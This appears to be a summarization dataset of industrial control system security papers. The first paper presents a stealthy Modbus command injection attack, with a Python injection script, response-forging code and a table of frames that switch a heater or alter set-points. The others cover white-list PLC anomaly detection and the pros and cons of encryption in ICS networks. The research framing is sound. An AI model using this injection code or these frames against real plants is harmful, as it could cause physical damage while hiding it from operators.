2) Stealthy Command Injection Attack: Figure 8 presents the full chain of our injection scenario. When a Modbus request frame is sent from the HMI to the PLC, the attacker intercepts this frame, drops it from the network, compares it to the request frames in his database, and finally computes the corresponding response(s) accordingly. Meanwhile, he sends a forged Modbus request frame (e.g., a R/W coils request) to the PLC, impersonating the HMI. This approach is quite severe, as the SCADA operator is tricked in a way that he is always shown fake views while the PLC is processing malicious commands sent by the attacker.
Fig. 8: Stealthy command injection attack scenario
This approach has a challenge. If the attacker stops his ARP poisoning attack, i.e., stops sending fake response messages to the HMI, and the HMI then requests the PLC register values with a Modbus request frame, the PLC responds by reporting its current status, i.e., the modified inputs and outputs. Therefore, the SCADA operator can discover that the system is operating abnormally. To overcome this challenge and make our attack even more severe, the attacker should re-initialize all the registers to the values stored prior to his attack. To this end, he needs to read all the register values before the attack and write these values back to the PLC before he closes the TCP communication with the devices. This restores the previous system state after the attack stops, and the PLC will report to the HMI the last view prior to the injection.
Fig. 9: Virtual SCADA system based on OpenPLC and ScadaBR software
V. IMPLEMENTATION AND EVALUATION
A. Experimental Settings
1) Lab Setup: We evaluate our attack approach on a virtual SCADA system based on OpenPLC and ScadaBR software, as shown in Figure 9.
The given virtual system represents a water tank heater experiment. It aims at keeping the temperature of a water tank at a certain value, e.g., 40 °C. That is, if the temperature goes below 40 °C, the corresponding sensor (input) reports to the PLC, and the PLC responds by sending a control command to the heater (output) to switch it ON. The heater remains ON until the temperature is again as high as the configured set-point. This process works in two configuration modes: Auto and Manual. The interaction between OpenPLC and ScadaBR is handled using the Modbus protocol over TCP/IP, where ScadaBR is the master device and OpenPLC is the slave device. The control logic program is developed using the OpenPLC Editor in one of the five high-level programming languages defined in IEC 61131 [28]. The PLC program is then compiled to an ST file before being uploaded to the OpenPLC.
2) Attacker Model: We assume that an attacker has access to the level-3 network of the Purdue Model (https://www.goingstealthy.com/the-ics-prude-model/). This assumption is based on real-world SCADA attacks, e.g., the TRITON [29] and BlackEnergy [5] attacks, which got access to the control center via a typical IT attack vector such as an infected USB stick or a social engineering attack. After gaining level-3 network access, an attacker can make use of software and libraries to communicate with the target PLC over the network. Since these assumptions have been reported to hold true in reports on real-world attacks, we are convinced that our attack is a realistic one.
B. Attack Implementation
After placing the attacker in a MITM position between ScadaBR and OpenPLC, he first reads all the current values stored in the PLC's memory registers, e.g., coils, inputs, etc. Figures 10-15 show all the request-response frames exchanged between the attacker and the OpenPLC to obtain these values.
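As an illustration of this register-snapshot step, the sketch below decodes a Read Coils (0x01) response of the kind shown in Fig. 11, where only coils 0 and 63 are set. The helper name is ours and the example frame bytes are constructed for illustration; the assumption that coil bits are packed LSB-first within each data byte follows the Modbus convention.

```python
def coils_set(response_adu: bytes):
    """Indices of coils that are ON in a Read Coils response ADU
    (7-byte MBAP header, function 0x01, byte count, packed coil bytes)."""
    byte_count = response_adu[8]
    on = []
    for i, b in enumerate(response_adu[9:9 + byte_count]):
        for j in range(8):
            if b >> j & 1:                 # bits packed LSB-first per byte
                on.append(i * 8 + j)
    return on

# Illustrative reply with only coils 0 and 63 set, as in Fig. 11
reply = bytes.fromhex("00010000000b0101080100000000000080")
```

Recording these decoded values before the injection is what lets the attacker restore the pre-attack state later.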
To inject the PLC with different false commands, we developed a simple Python script that sends crafted Modbus request frames to the target IP address on the open port 502. Table II shows the format of the frames we used to attack the given virtual system in Figure 9. For instance, if an attacker aims at turning the heater OFF in Auto mode, the following frame should be sent to the PLC: 0x010600040000. Our results showed that we could successfully modify different inputs, outputs, and data stored in the PLC registers, as shown in Figure 16.
Fig. 10: Request frame sent from the attacker to the OpenPLC - read all PLC coils
To conceal our injection from the SCADA operator, we developed an attacking tool that sniffs all the Modbus request frames from the network, compares them to the ones in our database, and finally responds with the appropriate response(s) to the HMI.
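A minimal sketch of such an injection script, assuming the Table II byte layout (unit id, function code, register address, value) wrapped in an MBAP header before being pushed to TCP port 502; the function name, target host, and transaction id are placeholders, not the paper's actual tool.

```python
import socket
import struct

def inject(host: str, unit_pdu: bytes, tid: int = 1, port: int = 502) -> bytes:
    """Prepend an MBAP header to `unit_pdu` (unit id byte + Modbus PDU),
    send it to the PLC, and return the raw reply."""
    mbap = struct.pack(">HHH", tid, 0, len(unit_pdu))
    with socket.create_connection((host, port), timeout=2) as s:
        s.sendall(mbap + unit_pdu)
        return s.recv(260)

# Table II entry: unit 0x01, Write Single Register (0x06),
# register 0x0004, value 0x0000 -> heater OFF in Auto mode
heater_off_auto = bytes.fromhex("010600040000")
```

For example, `inject("192.0.2.50", heater_off_auto)` would push the heater-OFF frame to a PLC at that (placeholder) address.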
After launching our tool, if the ScadaBR sends a Modbus request (e.g., write single register) to the OpenPLC, our MITM system intercepts this frame, compares it with the ones existing in our database (precisely, with the request frames), and finally replies to the ScadaBR by sending the corresponding response frame(s) based on the Transaction ID, Unit ID, and Function Code. It is worth mentioning that the attacker still needs to drop the original request from the network to avoid updating the PLC's registers. However, this is an easy task, as the attacker only needs to not complete the full cycle of the MITM attack, i.e., he does not forward the frame to the final destination (the PLC).
Algorithm 1: FCI Attack based on the Database Approach
Function inject(iface=eno, src_port)
 1: packet = sniff(iface = eno, timeout = cfg_sniff_time)
 2: save_pcap(sniff.pcap)
 3: for pcap in rdpcap(save_pcap) do
 4:   src_id = pcap[1:6], dest_id = pcap[7:12], mbus_pkt = filter_mbus(pcap)
 5:   for pkt in mbus_pkt() do
 6:     trans_id = pkt[1:2], protocol_id = pkt[3:4], length = pkt[5:6], unit_id = pkt[7], function = pkt[8:9], start_address = pkt[10:11], data = pkt[12:]
 7:     if (src_ip == ScadaBR_src_ip and dest_ip == plc_ip) then
 8:       for p in rdpcap(response_pcap) do
 9:         if trans_id == p[1:2] and unit_id == p[7] and function == p[8:9] then
10:           fgd_pkt = p[1:]; break
11:         end if
12:         p = p + 1
13:       end for
14:     end if
15:     pkt = pkt + 1
16:   end for
17:   pcap = pcap + 1
18: end for
19: while time_slot() do
20:   sendp(iface, fgd_pkt, src_ip, port)
21: end while
End Function
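The matching step at the heart of Algorithm 1 — look up a recorded response by Transaction ID, Unit ID, and Function Code — can be sketched in plain Python. This is a simplified illustration, not the authors' tool; the recorded request/response pair below is illustrative, and the byte offsets follow the standard Modbus/TCP MBAP layout.

```python
def frame_key(frame: bytes):
    """Extract (transaction id, unit id, function code) from a Modbus/TCP frame.
    MBAP: bytes 0-1 txn id, 2-3 protocol id, 4-5 length, 6 unit id; byte 7 is the
    PDU function code."""
    return frame[0:2], frame[6], frame[7]

def build_response_db(recorded_pairs):
    """Index recorded request/response pairs the way Algorithm 1 searches them."""
    return {frame_key(req): resp for req, resp in recorded_pairs}

def forged_reply(request: bytes, db):
    """Return the recorded response matching an intercepted request, if any."""
    return db.get(frame_key(request))

# Illustrative pair: a 'write single register' request and its echo response.
req = bytes.fromhex("000100000006" + "010600040000")
resp = bytes.fromhex("000100000006" + "010600040000")
db = build_response_db([(req, resp)])
```

A real tool would also drop the intercepted request instead of forwarding it, as the text notes, so the PLC's registers are never updated.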
Table II: Modbus frames and their corresponding actions
Action                               | Modbus frame
Turning the Heater ON (Manual Mode)  | 0x01 0x06 0x00 0x05 0x00 0x01
Turning the Heater OFF (Manual Mode) | 0x01 0x06 0x00 0x05 0x00 0x00
Turning the Heater ON (Auto Mode)    | 0x01 0x06 0x00 0x04 0x00 0x01
Turning the Heater OFF (Auto Mode)   | 0x01 0x06 0x00 0x04 0x00 0x00
Setting a new temperature            | 0x01 0x06 0x00 0x01 0x2f 0xff
Setting a new set-point              | 0x01 0x06 0x00 0x02 0x2f 0xff
VI. SECURITY COUNTERMEASURES
Our experiments presented in this paper showed that there is no security in the Modbus protocol. Therefore, if attackers could access a Modbus device on a network, they would be able to read/write whatever and whenever they want. Based on this fact, many industrial engineers implemented firewalls between the internet server and the control network to protect their systems, i.e., all the Modbus devices are placed behind the firewalls (see Figure 17).
Fig. 17: SCADA system architecture using firewalls
This method separates Modbus devices from the internet, but if any server behind the firewall is authorized to access the Modbus devices through the firewall, there is a vulnerability. Therefore, implementing firewalls alone, without any additional security measures, has partly failed to prevent cyber-attacks. The advanced firewall presented in [30] would be a more reasonable protection method. The authors designed an industrial-specific firewall based on the Modbus protocol. Their firewall combines security policies with Deep Packet Inspection (DPI). An alternative solution would be using the modified version of the Modbus protocol introduced in [31]. This new protocol version implements anti-replay techniques and authentication mechanisms that validate each packet received at Modbus devices. Another appropriate solution would be the one introduced in [32], which deploys security functions in the messaging stack prior to transmission.
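The DPI idea behind an industrial-specific firewall can be illustrated with a minimal filter: parse each Modbus/TCP frame and pass it only when the unit id, function code, and (for writes) register address match an allow-list. This is a sketch of the general technique, not the design of [30]; the policy entries below are illustrative.

```python
import struct

# Illustrative policy: only reads of coils/holding registers and writes to
# register 1 (the temperature value) are permitted from the HMI.
ALLOW = {
    (0x01, 0x01),          # unit 1, read coils
    (0x01, 0x03),          # unit 1, read holding registers
    (0x01, 0x06, 0x0001),  # unit 1, write single register, address 1
}

def permit(frame: bytes) -> bool:
    """Deep-packet inspection of one Modbus/TCP frame (MBAP header + PDU)."""
    if len(frame) < 8:
        return False
    unit, func = frame[6], frame[7]
    if func == 0x06:  # write single register: also check the target address
        (addr,) = struct.unpack(">H", frame[8:10])
        return (unit, func, addr) in ALLOW
    return (unit, func) in ALLOW
```

Under this policy, a write to register 4 (the heater command from Table II) would be dropped, while a legitimate temperature update passes.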
The authors used AES [33], RSA [34], or SHA-2 [35] algorithms to encrypt the Modbus packet, while a secret key is exchanged between the master and the slave using a separate secure channel. All the aforementioned security methods are reasonable solutions to secure Modbus-based SCADA systems against our injection attack or similar scenarios, if they are implemented.
VII. CONCLUSION AND FUTURE WORK
This paper presented a false command injection (FCI) attack scenario against Modbus-based SCADA systems, where an external adversary exploited insecurities of the Modbus protocol and injected the target PLC with malicious commands. To make our attack more challenging, we involved a database containing real request-response interaction pairs, which helps the adversary to always reply to the HMI with the expected responses. This conceals our attack from the operator and decouples the PLC from the HMI, i.e., the operator will not notice any abnormal behavior on the control site. Our attack scenario is quite severe if conducted against real-world SCADA systems, and the consequences could be disastrous if the targets are critical infrastructures or nuclear plants. To secure Modbus-based SCADA systems, plants, and industrial environments, we suggested some security countermeasures that assist in mitigating/detecting our attack or similar scenarios, if they are applied.
In respect of securing SCADA systems, the Modbus organization released a newer Modbus protocol variant, namely Modbus Transport Layer Security (TLS, https://modbus.org/docs/MB-TCP-Security-v21_2018-07-24.pdf), running on port 802.
This advanced protocol adds security specifications that the traditional Modbus protocol lacks (e.g., authentication and message-integrity mechanisms) to prevent cyber-attacks such as DoS, MITM, replay attacks, etc. Modbus TLS has still not been well analyzed by researchers from the security point of view. Thus, we aim in the future to investigate this developed protocol against our attack approach, as the Modbus organization claims that it is more resilient against cyber-attacks and even secured by an additional security layer between the server and client devices. Therefore, investigating the security of such a protocol will be more challenging and complex.
Summary:
Modbus is a widely-used industrial protocol in Supervisory Control and Data Acquisition (SCADA) systems for different purposes such as controlling remote devices, monitoring physical processes, data acquisition, etc. Unfortunately, such a protocol lacks security means, i.e., authentication, integrity, and confidentiality. This has exposed industrial plants using the Modbus protocol and made them attractive to malicious adversaries who could perform various kinds of cyber-attacks causing significant consequences, as Stuxnet showed. In this paper, we exploit the insecurity of the Modbus protocol and perform a stealthy false command injection scenario, concealing our injection from the SCADA operator. Our attack approach is comprised of two main phases: 1) a pre-attack phase (offline), where an attacker sniffs, collects, and stores sufficient valid request-response pairs in a database; 2) an attack phase (online), where the attacker performs false command injection and conceals his injection by replaying a valid response from his database upon each request sent from the HMI user. Such a scenario is quite severe and might cause disastrous damage in SCADA systems and critical infrastructures if it is successfully implemented by malicious adversaries. Finally, we suggest some appropriate mitigation solutions to prevent such a serious threat.
|
Summarize:
I. INTRODUCTION
Recently, industrial control systems (ICSs) have been connected to the internet, and the PLC (Programmable Logic Controller) is becoming a network communication device [1]. Accordingly, a number of security incidents such as cyber- and virus-attacks have been reported so far [2][3]. Therefore, it is necessary to apply countermeasures not only to the monitoring system and network devices but also to the PLC. The former are developed based on information security techniques, because ICS introduces Windows OS and TCP/IP-based networks to connect to the internet. On the other hand, the latter case is not the same as the former cases, because the firmware of PLCs is not always standardized. A previous study proposes an incident detection technique via Petri nets as one of the countermeasures applicable to PLCs [4]. This method focuses on the input-output of the field devices connected to the PLC. The detection method uses anomaly behavior models, which model the field devices via Petri nets. Those models can be regarded as pattern files of black-list-type antivirus software. The detection performance of a black list depends on the pattern files and thus requires frequent updates of the pattern files to keep a high detection rate, although the black list allows us to identify the category of the security incident. Also, the CPU load depends on the pattern file size when the system checks against the black list. A large file adversely affects the real-time processing performance of the PLC and, at worst, results in anomalous behaviors of the field devices. This study focuses on a detection method based on a white list. Reference [5] proposes a white list targeting communication packets in SCADA (Supervisory Control And Data Acquisition). Reference [6] proposes a white list targeting VoIP. These detection methods register the normal operations as lists and detect anomalous operations which are not registered in the white list.
This detection method does not need to update the list to keep a high detection rate. The CPU load due to checking against the white list is lower than against the black list. The update timing of the white list is at system maintenance, when the normal operation of the ICS is changed. Therefore, we apply the white list to the PLC, and aim to detect security incidents appearing on the field devices. It is expected that the white list allows the PLC to detect cyber-attacks like the virus Stuxnet and PLC Blaster that change part of the data of the control program by taking over the normal control command. In this study, we define the list which registers the behavior of sensors and actuators as a white list. First, we model the normal operations via Petri net. Second, we convert the Petri net model to a ladder diagram. The ladder diagram is one of the programming languages often used in programming PLCs. This method applies the white list in the application program. Therefore, it can add the detection method to the PLC regardless of the type of PLC. There are previous studies which propose ways to convert a Petri net model to a ladder diagram [7][8]. Reference [7] proposed a transform method to express the behavior of a Petri net by a ladder diagram. A ladder diagram converted by this previous method has only the event order information of the Petri net. Therefore, it cannot detect abnormal operations. In this study, we propose a transform method to convert the Petri net model to a ladder diagram with the constraint conditions of the Petri net. In addition, we add a diagnostic function to the ladder diagram which diagnoses whether the constraint conditions are met. Therefore, it can detect incidents by the ladder diagram. First, this paper describes the Petri net and the ladder diagram. Next, this paper proposes the transform method which can convert the Petri net model to a ladder diagram.
Finally, this paper shows the results of verification experiments.
On Experimental Verification of Model Based White list for PLC Anomaly Detection
Akinori Mochizuki, Kenji Sawada, Seiichi Shin, The University of Electro-Communications; Shu Hosokawa, Control System Security Center
* This work was supported by Council for Science, Technology and Innovation (CSTI), Cross-ministerial Strategic Innovation Promotion Program (SIP), Cyber-Security for Critical Infrastructure (funding agency: NEDO).
Akinori Mochizuki is with The University of Electro-Communications, Tokyo, Japan (e-mail: akinori.m@uec.ac.jp). Kenji Sawada is with The University of Electro-Communications, Tokyo, Japan (e-mail: knj.sawada@uec.ac.jp). Seiichi Shin is with The University of Electro-Communications, Tokyo, Japan (e-mail: seiichi.shin@uec.ac.jp). Shu Hosokawa is with Control System Security Center, Miyagi, Japan (e-mail: shu.hosokawa@css-center.or.jp).
2017 11th Asian Control Conference (ASCC), Gold Coast Convention Centre, Australia, December 17-20, 2017. 978-1-5090-1573-3/17/$31.00 2017 IEEE. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply.
II. MODELING VIA PETRI NET
A. Petri net
The Petri net is a modeling tool which can model discrete event systems [9]. A Petri net is a bipartite graph composed of two node classes, places and transitions, connected by arcs. Table I shows the formal definition of a Petri net according to [10].
Table I. Formal definition of Petri net
A Petri net is a 5-tuple PN = (P, T, F, W, M0) where:
  P = {p1, p2, ..., pm} is a finite set of places,
  T = {t1, t2, ..., tn} is a finite set of transitions,
  F ⊆ (P × T) ∪ (T × P) is a set of arcs,
  W : F → {1, 2, 3, ...} is a weight function,
  M0 : P → {0, 1, 2, 3, ...} is the initial marking,
  P ∩ T = ∅ and P ∪ T ≠ ∅.
A Petri net structure N = (P, T, F, W) without any specific initial marking is denoted by N. A Petri net with the given initial marking is denoted by (N, M0).
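The 5-tuple of Table I maps directly onto a small data structure. A sketch in Python (the net below is a generic two-place example for illustration, not the paper's Ball-Sorter model):

```python
from dataclasses import dataclass, field

@dataclass
class PetriNet:
    """PN = (P, T, F, W, M0): places, transitions, arcs with weights, marking.
    Arcs F and weights W are merged into one dict: (source, target) -> weight."""
    places: set
    transitions: set
    weights: dict                      # (p, t) or (t, p) -> arc weight
    marking: dict = field(default_factory=dict)

    def enabled(self, t):
        """t is enabled iff each input place p holds at least W(p, t) tokens."""
        return all(self.marking.get(p, 0) >= w
                   for (p, tt), w in self.weights.items()
                   if tt == t and p in self.places)

net = PetriNet(
    places={"p1", "p2"},
    transitions={"t1"},
    weights={("p1", "t1"): 1, ("t1", "p2"): 1},
    marking={"p1": 1, "p2": 0},
)
```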
Petri nets have asynchrony and concurrency. In addition, Petri nets are applicable for modeling dynamic state transitions. Therefore, they can visualize the dynamic state of an incident. The state of the system is represented by the number of tokens which occupy the places. If a transition fires, tokens are removed from its input places and marked in its output places. A transition is enabled if each of its input places contains at least as many tokens as there are arcs from the place to the transition. A Petri net model shows system behavior using this firing rule. Let x be the number of marking tokens. Then the following equation (1) is always satisfied, where M is an arbitrary natural number:
0 ≤ x ≤ M (1)
Graphically, places are represented by circles, transitions by rectangles, arcs by directed arrows, and tokens by small solid circles. Fig. 1 shows the simplest Petri net model. It is necessary to define the meaning of transitions and places when modeling a control system via Petri net. Fig. 2 shows a self-loop. A self-loop means a transition and a place connected by an interactive (bidirectional) arc. A transition connected to a self-loop can fire only when the place has a token. Therefore, a self-loop can limit transition firing. In addition, there is an inhibitor arc that limits transition firing. Fig. 3 shows the inhibitor arc. A transition connected to an inhibitor arc can fire only when the connected place has no tokens.
B. Timed Petri net
The timed Petri net introduces the concept of time into the Petri net [11]. Time Petri nets (TPN) are classic Petri nets where each transition is associated with a time interval [at, bt]. When a transition becomes enabled, it cannot fire before at time units have elapsed, and it has to fire no later than bt time units after being enabled. Here at and bt are relative to the point in time when the transition last became enabled.
The time at is the earliest possible firing time for a transition and is called the earliest firing time, and bt is the latest possible firing time and is called the latest firing time. The firing of a transition itself does not take up any time. The timed Petri net can thus visualize operation delays. Fig. 4 shows a timed Petri net model.
C. The Reason Why the Petri net
Almost every control system consists of field devices: sensors and actuators. Therefore, the behavior of the sensors and actuators can be considered the actual movement of the control system. Hence, if the behavior of sensors and actuators can be converted to discrete events, the actual movement of the control system can be modeled via Petri net. A previous study [4] considered modeling FA (Factory Automation) via Petri net.
D. The Example of Modeling
In this study, as one example, we model the Ball-Sorter control system [10] shown in Fig. 5. The function of the Ball-Sorter is sorting balls according to their weight as a normal operation. We use a ping-pong ball as a light ball, and a golf ball as a heavy ball. Fig. 6 shows the schematic of the Ball-Sorter. The Ball-Sorter has three air cylinders (Cylinder1, Cylinder2, and Cylinder3), one sorting sensor (S-sensor), and three proximity sensors (P-sensor1, P-sensor2, and P-sensor3). When the ball is a ping-pong ball, the Ball-Sorter sorts the ball to BOX1. When the ball is a golf ball, the Ball-Sorter sorts the ball to BOX2.
Fig. 1: Petri net
Fig. 2: Self-loop
Fig. 3: Inhibitor arc
Fig. 4: Timed Petri net
Fig. 5: Appearance of Ball-Sorter system
When modeling the Ball-Sorter, we define transition firings as the ON/OFF operations of the actuators and sensors. We model the Ball-Sorter so as to represent the event order in normal operation. Fig. 7 shows the Ball-Sorter Petri net model. Table II and Table III show the names and meanings of the transitions and states in Fig. 7.
III. LADDER DIAGRAM
The ladder diagram is a programming language that represents a program by a graphical diagram based on the circuit diagrams of relay logic hardware. Ladder diagrams are used to develop software for the PLCs used in control systems. Global standardization of PLCs based on the international standard IEC 61131-3 is ongoing [1]. A PLC based on this international standard can be programmed in FBD (Function Block Diagram), IL (Instruction List), and ST (Structured Text), not only the ladder diagram. In this study, we use the ladder diagram, which is the most common, and FBD, which can program PLCs not based on IEC 61131-3 in most cases.
Fig. 6: Schematic of Ball-Sorter control system
Table II. Transitions
Transition    | Meaning (behavior)
Psensor1_on   | P-sensor1 turns ON
Psensor2_on   | P-sensor2 turns ON
Psensor3_on   | P-sensor3 turns ON
Ssensor_off   | S-sensor turns OFF
Ssensor_on    | S-sensor turns ON
Cylinder1_on  | Air cylinder 1 turns ON
Cylinder1_off | Air cylinder 1 turns OFF
Cylinder2_on  | Air cylinder 2 turns ON
Cylinder2_off | Air cylinder 2 turns OFF
Cylinder3_on  | Air cylinder 3 turns ON
Cylinder3_off | Air cylinder 3 turns OFF
Table III. Places
Place         | Meaning (state)
buffer        | Buffer
Cylinder1_on  | Air cylinder 1 ON state
Cylinder1_off | Air cylinder 1 OFF state
Cylinder2_on  | Air cylinder 2 ON state
Cylinder3_on  | Air cylinder 3 ON state
Psensor1_on   | P-sensor 1 ON state
Psensor2_on   | P-sensor 2 ON state
Psensor3_on   | P-sensor 3 ON state
Ssensor1_off  | S-sensor OFF state
Ssensor2_on   | S-sensor ON state
Fig. 7: Petri net model of Ball-Sorter (transition timing intervals [0,3] and [0,∞])
IV.
CONVERT THE PETRI NET TO LADDER DIAGRAM
In this section, we propose the way to convert the Petri net model to a ladder diagram with the constraint conditions of the Petri net. In normal operation of the Petri net model, when a transition T fires, the marking tokens x in the input places move to the output places following the direction of the arcs F and the weight function W. A transition t can fire only when each input place p of t is marked with at least w(p, t) tokens. Therefore, when an abnormal operation of a basic Petri net model like Fig. 1 occurs, equation (1) is not satisfied as a result. When equation (1) is not satisfied, it can be regarded that an abnormal operation of the control system has occurred. Accordingly, the abnormal operation can be detected by adding a diagnostic function which diagnoses equation (1), not only by converting the Petri net to a structured ladder diagram. Consider the abnormal operation of a self-loop like Fig. 2: the transition fires while the place connected to the self-loop has no marking tokens. Therefore, detecting this abnormal operation by ladder diagram requires adding a diagnostic function which diagnoses the rule of the self-loop. Consider the abnormal operation of a model using an inhibitor arc like Fig. 3: a transition connected to an inhibitor arc can fire only when its input place has no marking, so the abnormal operation is that such a transition fires while the input place has a marking. Therefore, detecting this abnormal operation by ladder diagram requires adding a diagnostic function which diagnoses the rule of the inhibitor arc. Consider the abnormal operation of a timed Petri net like Fig. 4: a transition in a timed Petri net can fire after a specified
time between at and bt. Therefore, one of the abnormal operations of a timed Petri net is that the firing time of a transition is not between at and bt. To detect this abnormal operation by ladder diagram, a diagnostic function which diagnoses the rule of the timed Petri net needs to be added.
Table IV shows examples of the conversion from Petri net model to ladder diagram (constructs: basic Petri net, self-loop, inhibitor arc, timed Petri net). ADD, SUB, LT, GT, EQ and TON are FBs: ADD represents an adder; SUB a subtractor; LT, GT and EQ represent the comparators <, >, and =, respectively; TON is an ON-delay timer. The number of marking tokens x is defined as an integer. It is necessary to discretize the inputs and outputs of the sensors and actuators by using a function which differentiates the rising edge of a signal, as in Fig. 8, because the Petri net is a discrete-event model. The ladder diagram output Attack is the detection output for abnormal operation: turning ON the output Attack means that the ladder diagram has detected an abnormal operation. The Petri net model shown in Fig. 7 can be converted to a ladder diagram following the examples in Table IV, because it is constituted of those examples. In this study, we converted the Petri net model shown in Fig. 7 to a ladder diagram; space did not permit us to insert the converted ladder diagram.
V. EXPERIMENTAL VERIFICATION
In this section, we show the capability of the PLC white list by experimental verification. The experiments used the Ball-Sorter shown in Fig. 5.
A. Method
There are various cyber-attack methods targeting PLCs, such as propagating through a network or connecting directly. Ultimately, these cyber-attacks falsify internal variables within the PLC or illegally rewrite the program.
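The diagnostic idea of Section IV — flag an incident whenever an observed event violates the model's firing constraints — can be sketched as a software monitor. This is a simplified Python analogue of the diagnostic ladder logic, not the authors' implementation; the token bound and the event trace below are illustrative.

```python
def diagnose(marking, events, max_tokens):
    """Replay observed events against the Petri net model; report an attack
    when a transition fires while disabled, or when the total token count
    leaves its bound (the analogue of checking equation (1))."""
    m = dict(marking)
    for name, pre, post in events:
        if any(m.get(p, 0) < w for p, w in pre.items()):
            return f"attack: {name} fired while disabled"
        for p, w in pre.items():
            m[p] -= w
        for p, w in post.items():
            m[p] = m.get(p, 0) + w
        if sum(m.values()) > max_tokens:
            return f"attack: token bound exceeded after {name}"
    return "normal"

# Normal sequence: the cylinder turns ON and then OFF.
trace = [
    ("Cylinder1_on",  {"Cylinder1_off": 1}, {"Cylinder1_on": 1}),
    ("Cylinder1_off", {"Cylinder1_on": 1},  {"Cylinder1_off": 1}),
]
```

An injected actuator command that turns the cylinder ON twice in a row fires a disabled transition and is flagged, mirroring the experiments of Section V.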
Therefore, we carry out the following three experiments of normal operation and cyber-attack incidents:
Exp.(i): Normal operation (no cyber-attack)
Exp.(ii): Abnormal output of actuator command
Exp.(iii): Falsification of part of a program
The normal operation in Exp.(i) throws in 4 balls. Table V shows the ball sequence thrown into the Ball-Sorter; P represents a ping-pong ball, and G a golf ball. The incident in Exp.(ii) is caused by a command from an engineering device. The incident in Exp.(iii) is a falsification of the ladder diagram to sort the golf ball to BOX1.
B. Result
Figs. 9-11 show the time series plots of the anomaly detection output in Exp.(i)-(iii), respectively. The vertical axis shows the anomaly detection output, and the horizontal one the time. The anomaly detection output taking the value 1 means that the system detects an abnormal operation. In Exp.(i), the PLC did not detect an incident, because the output did not take the value 1 in Fig. 9. In Exp.(ii), the PLC detected the incident at the 5th second, because the output took the value 1. In Exp.(iii), the PLC detected the incident at the 8th second. From the results of these experiments, we confirmed the effectiveness of the proposed detection method.
Table V. Ball sequence: 1-P, 2-G, 3-P, 4-G
Fig. 8: UP contact
Fig. 9: Exp.(i) Normal operation
Fig. 10: Exp.(ii) Abnormal output of actuator command
Fig. 11: Exp.(iii) Falsification of part of a program
C. A Load on the PLC
In this study, we measured the load on the PLC due to the white list. Table VI shows the load on the PLC with and without the white list. The total number of steps means the number of lines in the ladder diagram. Scan time means the amount of time it takes for the PLC to make one scan cycle.
The scan cycle is the cycle in which the PLC gathers the inputs, runs the ladder diagram, and then updates the outputs.
VI. CONCLUSION
We proposed a method to apply a detection function to the PLC. The PLC can have the white list by converting the Petri net model, which models the behavior of the field devices, to a ladder diagram. In addition, we verified the capability of the proposed detection function through an actual experiment. However, this method requires modeling the control system via Petri net manually, which takes time and cost for complicated systems. In future work, a method to model the control system automatically from logs [12] is necessary.
Summary:
Recently, defensive countermeasures for controllers have become important because cyber-attacks on control systems are growing rapidly. This paper proposes a white-list anomaly detection method using the PLC (Programmable Logic Controller) as one of the countermeasures for controllers. This paper introduces a white list design technique which models normal behaviors of field devices via Petri net and converts the white list model to a ladder diagram. It allows the PLC to detect cyber-attacks.
|
Summarize:
I. INTRODUCTION
SCADA (Supervisory Control and Data Acquisition) systems and DCS (Distributed Control Systems) form an important subset of ICS (Industrial Control Systems), overseeing complex physical processes in industrial and critical infrastructures which usually span a large geographic area (e.g., a pipeline, an electrical grid). Over the last decades, ICS have evolved from largely isolated systems to largely interconnected ones, boosting efficiency but opening up the possibility of cyberattacks; indeed, in the last decade, we have witnessed a number of attacks on ICS [5], [25], [10], [7], [23], [4], [12], [30], [31], [15], [2]. The response from the ICS community has been to increase the attention to the security mechanisms already in place, and to look for new ways to defend against malicious entities. One of the proposed mechanisms to secure ICS is to encrypt communications transmitted over SCADA networks. A few proposals are on the table and, at the time of writing this article, there is a committee discussing a possible standardization for the use of encryption on ICS networks. It is well known that security always comes at a cost, which is not only monetary, but also in terms of, e.g., usability of the system [27]. It is therefore important to evaluate whether a solution is actually worth its costs. To make such an evaluation one has to take into due consideration the attacker model at hand, the possible attacker model in the future, and the business model of the stakeholders in the ICS. This paper aims at contributing to the discussion on the pros and cons of network encryption for ICS by providing a basis for analysing the costs and the benefits of such a solution. We determine key threats by considering recently reported ICS attacks. As the business model of the specific target ICS will also influence the discussion, the reasoning and the conclusions of this work have to be instantiated intelligently to the various application fields.
Yet there are some generally applicable conclusions we believe apply to ICS architectures in general. The first conclusion is that, in most cases, introducing encryption (in the ICS internal network) does not yield extra security. None of the attacks we considered would have been blocked or made more difficult by the addition of encryption. Encryption aims at mitigating confidentiality leaks "on the wire", while the witnessed attacks target endpoints. Also, in many of the attacks, confidentiality is not the security goal being breached. We know of no record of an attack "on the wire" occurring in practice, while many damaging hypothetical attacks may be mitigated by authentication checks rather than encryption. The second conclusion is that encryption can actually have negative consequences for security. For instance, many attacks can be detected with state-of-the-art Network Intrusion Detection Systems (NIDS), provided that the NIDS has access to the communication contents. Of course, one can implement encryption with appropriate taps for intrusion detection, but this adds to the cost of the solution. The third and last conclusion is that encryption can considerably raise the costs of troubleshooting and recovery. For instance, problems (e.g., communication troubles, retransmissions, failing devices, etc.) can be identified (much) more quickly and easily in an unencrypted network than in an encrypted one. We do not advocate completely ruling out encryption of ICS network traffic: in some cases it makes a lot of sense (for instance, long-haul connections over untrusted networks, and in systems operating in an adversarial environment). Instead, we advocate healthy reasoning on what encryption is actually good for, and what are its costs, particularly in terms of the loss of safety and security it may actually introduce.
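The contrast the paper draws between confidentiality and authenticity can be made concrete with a keyed MAC: the payload stays readable (so a NIDS can still inspect it), yet any tampering on the wire is detected. A minimal sketch, with an illustrative key and message (real deployments need proper key management):

```python
import hashlib
import hmac

KEY = b"shared-secret"  # illustrative only; not how keys should be provisioned

def tag(message: bytes) -> bytes:
    """Authenticate a cleartext SCADA message without encrypting it."""
    return hmac.new(KEY, message, hashlib.sha256).digest()

def verify(message: bytes, mac: bytes) -> bool:
    """Constant-time comparison; rejects frames modified in transit."""
    return hmac.compare_digest(mac, tag(message))

msg = b"WRITE register=4 value=0"  # payload remains visible to an IDS
mac = tag(msg)
```

This is the sense in which authentication and integrity are achievable "without full-fledged encryption": only the fixed-size tag is added, and confidentiality is deliberately not provided.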
